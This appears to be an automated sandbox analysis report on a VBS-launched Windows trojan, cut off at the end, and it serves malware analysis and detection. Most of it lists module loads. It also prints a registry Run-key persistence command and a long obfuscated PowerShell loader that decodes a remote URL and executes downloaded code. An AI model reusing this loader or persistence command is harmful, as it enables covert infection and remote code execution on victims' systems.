          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)"
          Source: Process Memory Space: powershell.exe PID: 1628, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@22/16@13/4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\-A796ZW
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:768:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkr3sefb.x45.ps1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1960
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1628
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5312
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld 